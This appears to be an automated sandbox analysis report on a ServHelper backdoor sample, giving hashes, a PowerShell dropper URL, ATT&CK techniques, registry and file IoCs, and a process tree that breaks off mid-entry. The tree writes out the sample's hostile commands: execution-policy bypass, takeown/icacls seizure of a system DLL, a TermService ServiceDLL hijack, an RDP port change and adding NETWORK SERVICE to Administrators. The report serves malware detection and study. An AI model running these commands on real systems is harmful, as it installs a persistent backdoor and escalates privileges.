servhelper | 5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa

Analysis

max time kernel
140s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
10-04-2024 11:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa.exe
Size

5.9MB
MD5

3cb66d271255d59945381fdc6fab9b91
SHA1

cba5bc5d238ffa84cadb81d8ac65c81c289ec74a
SHA256

5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa
SHA512

770a6f375c8ba6c3c4a7da63652b58ccac9a3a0c005cf1cfc8db21447ae247bcc705c8f20da683ca89e1f0102604e23310be76c4c5daf358f81d2b36008c9a75
SSDEEP

49152:ZvAR1erb/TkvO90dL3BmAFd4A64nsfJibC5IaYNPk6bs3xwXmUGzDrQMHLPSZaaH:ZvQpbwmAQQQQQQQQQQQQQ

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 7 IoCs

Processes:

powershell.exe

flow	pid	process
38	1752	powershell.exe
40	1752	powershell.exe
44	1752	powershell.exe
46	1752	powershell.exe
50	1752	powershell.exe
52	1752	powershell.exe
54	1752	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

4684 icacls.exe
888 icacls.exe
3212 icacls.exe
444 takeown.exe
2552 icacls.exe
4940 icacls.exe
4620 icacls.exe
716 icacls.exe

pid	process
4684	icacls.exe
888	icacls.exe
3212	icacls.exe
444	takeown.exe
2552	icacls.exe
4940	icacls.exe
4620	icacls.exe
716	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Loads dropped DLL 2 IoCs

Processes:

pid process

836
836
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

888 icacls.exe
3212 icacls.exe
444 takeown.exe
2552 icacls.exe
4940 icacls.exe
4620 icacls.exe
716 icacls.exe
4684 icacls.exe

pid	process
836
836

pid	process
888	icacls.exe
3212	icacls.exe
444	takeown.exe
2552	icacls.exe
4940	icacls.exe
4620	icacls.exe
716	icacls.exe
4684	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Branding\mediasrv.png	upx
C:\Windows\Branding\mediasvc.png	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

37 raw.githubusercontent.com
38 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

flow	ioc
37	raw.githubusercontent.com
38	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe

Drops file in Windows directory 18 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ahvu5uep.bhp.psm1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_s5sgdelx.1ow.ps1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIA295.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIA2B5.tmp	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIA236.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIA2D6.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIA2F6.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe

Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

4996 WMIC.exe

pid	process
4996	WMIC.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\knownfolder = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\DisplayName = "Internet"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1200 = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Flags = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4356 reg.exe
Runs net.exe

pid	process
4356	reg.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	40	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	44	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
4516	powershell.exe
4516	powershell.exe
4516	powershell.exe
876	powershell.exe
876	powershell.exe
876	powershell.exe
2300	powershell.exe
2300	powershell.exe
2300	powershell.exe
4932	powershell.exe
4932	powershell.exe
4932	powershell.exe
4516	powershell.exe
4516	powershell.exe
4516	powershell.exe
1752	powershell.exe
1752	powershell.exe
1752	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

660
660

pid	process
660
660

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa.exepowershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4840	5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa.exe
Token: SeDebugPrivilege	4516	powershell.exe
Token: SeDebugPrivilege	876	powershell.exe
Token: SeDebugPrivilege	2300	powershell.exe
Token: SeDebugPrivilege	4932	powershell.exe
Token: SeRestorePrivilege	3212	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	4996	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4996	WMIC.exe
Token: SeAuditPrivilege	4996	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	4996	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4996	WMIC.exe
Token: SeAuditPrivilege	4996	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3464	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3464	WMIC.exe
Token: SeAuditPrivilege	3464	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	3464	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3464	WMIC.exe
Token: SeAuditPrivilege	3464	WMIC.exe
Token: SeDebugPrivilege	1752	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exe

description	pid	process	target process
PID 4840 wrote to memory of 4516	4840	5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa.exe	powershell.exe
PID 4840 wrote to memory of 4516	4840	5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa.exe	powershell.exe
PID 4516 wrote to memory of 2492	4516	powershell.exe	csc.exe
PID 4516 wrote to memory of 2492	4516	powershell.exe	csc.exe
PID 2492 wrote to memory of 3968	2492	csc.exe	cvtres.exe
PID 2492 wrote to memory of 3968	2492	csc.exe	cvtres.exe
PID 4516 wrote to memory of 876	4516	powershell.exe	powershell.exe
PID 4516 wrote to memory of 876	4516	powershell.exe	powershell.exe
PID 4516 wrote to memory of 2300	4516	powershell.exe	powershell.exe
PID 4516 wrote to memory of 2300	4516	powershell.exe	powershell.exe
PID 4516 wrote to memory of 4932	4516	powershell.exe	powershell.exe
PID 4516 wrote to memory of 4932	4516	powershell.exe	powershell.exe
PID 4516 wrote to memory of 444	4516	powershell.exe	takeown.exe
PID 4516 wrote to memory of 444	4516	powershell.exe	takeown.exe
PID 4516 wrote to memory of 2552	4516	powershell.exe	Conhost.exe
PID 4516 wrote to memory of 2552	4516	powershell.exe	Conhost.exe
PID 4516 wrote to memory of 3212	4516	powershell.exe	icacls.exe
PID 4516 wrote to memory of 3212	4516	powershell.exe	icacls.exe
PID 4516 wrote to memory of 4940	4516	powershell.exe	icacls.exe
PID 4516 wrote to memory of 4940	4516	powershell.exe	icacls.exe
PID 4516 wrote to memory of 888	4516	powershell.exe	Conhost.exe
PID 4516 wrote to memory of 888	4516	powershell.exe	Conhost.exe
PID 4516 wrote to memory of 4684	4516	powershell.exe	msedge.exe
PID 4516 wrote to memory of 4684	4516	powershell.exe	msedge.exe
PID 4516 wrote to memory of 4620	4516	powershell.exe	Conhost.exe
PID 4516 wrote to memory of 4620	4516	powershell.exe	Conhost.exe
PID 4516 wrote to memory of 716	4516	powershell.exe	icacls.exe
PID 4516 wrote to memory of 716	4516	powershell.exe	icacls.exe
PID 4516 wrote to memory of 908	4516	powershell.exe	reg.exe
PID 4516 wrote to memory of 908	4516	powershell.exe	reg.exe
PID 4516 wrote to memory of 4356	4516	powershell.exe	reg.exe
PID 4516 wrote to memory of 4356	4516	powershell.exe	reg.exe
PID 4516 wrote to memory of 868	4516	powershell.exe	net1.exe
PID 4516 wrote to memory of 868	4516	powershell.exe	net1.exe
PID 4516 wrote to memory of 4672	4516	powershell.exe	net.exe
PID 4516 wrote to memory of 4672	4516	powershell.exe	net.exe
PID 4672 wrote to memory of 3444	4672	net.exe	net1.exe
PID 4672 wrote to memory of 3444	4672	net.exe	net1.exe
PID 4516 wrote to memory of 2188	4516	powershell.exe	cmd.exe
PID 4516 wrote to memory of 2188	4516	powershell.exe	cmd.exe
PID 2188 wrote to memory of 2076	2188	cmd.exe	cmd.exe
PID 2188 wrote to memory of 2076	2188	cmd.exe	cmd.exe
PID 2076 wrote to memory of 4788	2076	cmd.exe	net.exe
PID 2076 wrote to memory of 4788	2076	cmd.exe	net.exe
PID 4788 wrote to memory of 2924	4788	net.exe	net1.exe
PID 4788 wrote to memory of 2924	4788	net.exe	net1.exe
PID 4516 wrote to memory of 2820	4516	powershell.exe	cmd.exe
PID 4516 wrote to memory of 2820	4516	powershell.exe	cmd.exe
PID 2820 wrote to memory of 3456	2820	cmd.exe	cmd.exe
PID 2820 wrote to memory of 3456	2820	cmd.exe	cmd.exe
PID 3456 wrote to memory of 2232	3456	cmd.exe	net.exe
PID 3456 wrote to memory of 2232	3456	cmd.exe	net.exe
PID 2232 wrote to memory of 2588	2232	net.exe	net1.exe
PID 2232 wrote to memory of 2588	2232	net.exe	net1.exe
PID 2664 wrote to memory of 5052	2664	cmd.exe	net.exe
PID 2664 wrote to memory of 5052	2664	cmd.exe	net.exe
PID 5052 wrote to memory of 3160	5052	net.exe	net1.exe
PID 5052 wrote to memory of 3160	5052	net.exe	net1.exe
PID 4264 wrote to memory of 1728	4264	cmd.exe	net.exe
PID 4264 wrote to memory of 1728	4264	cmd.exe	net.exe
PID 1728 wrote to memory of 1300	1728	net.exe	net1.exe
PID 1728 wrote to memory of 1300	1728	net.exe	net1.exe
PID 2008 wrote to memory of 4784	2008	cmd.exe	cmd.exe
PID 2008 wrote to memory of 4784	2008	cmd.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa.exe
"C:\Users\Admin\AppData\Local\Temp\5911ad0a2f2f76cbe6e83b58b95ac820aee88b7fb37e017275bd3984b3b92bfa.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4840
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
  2⤵
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4516
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qwybtoh2\qwybtoh2.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2492
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1DA5.tmp" "c:\Users\Admin\AppData\Local\Temp\qwybtoh2\CSCC7D63F4041F14100A73C23754AA79A6.TMP"
      4⤵
      PID:3968
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:876
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2300
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4932
- - C:\Windows\system32\takeown.exe
    "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:444
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2552
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:3212
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4940
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:888
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4684
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:4620
- - C:\Windows\system32\icacls.exe
    "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:716
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
    3⤵
    PID:908
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
    3⤵
    - Sets DLL path for service in the registry
    - Modifies registry key
    PID:4356
- - C:\Windows\system32\reg.exe
    "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    3⤵
    PID:868
- - C:\Windows\system32\net.exe
    "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4672
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      PID:3444
- - C:\Windows\system32\cmd.exe
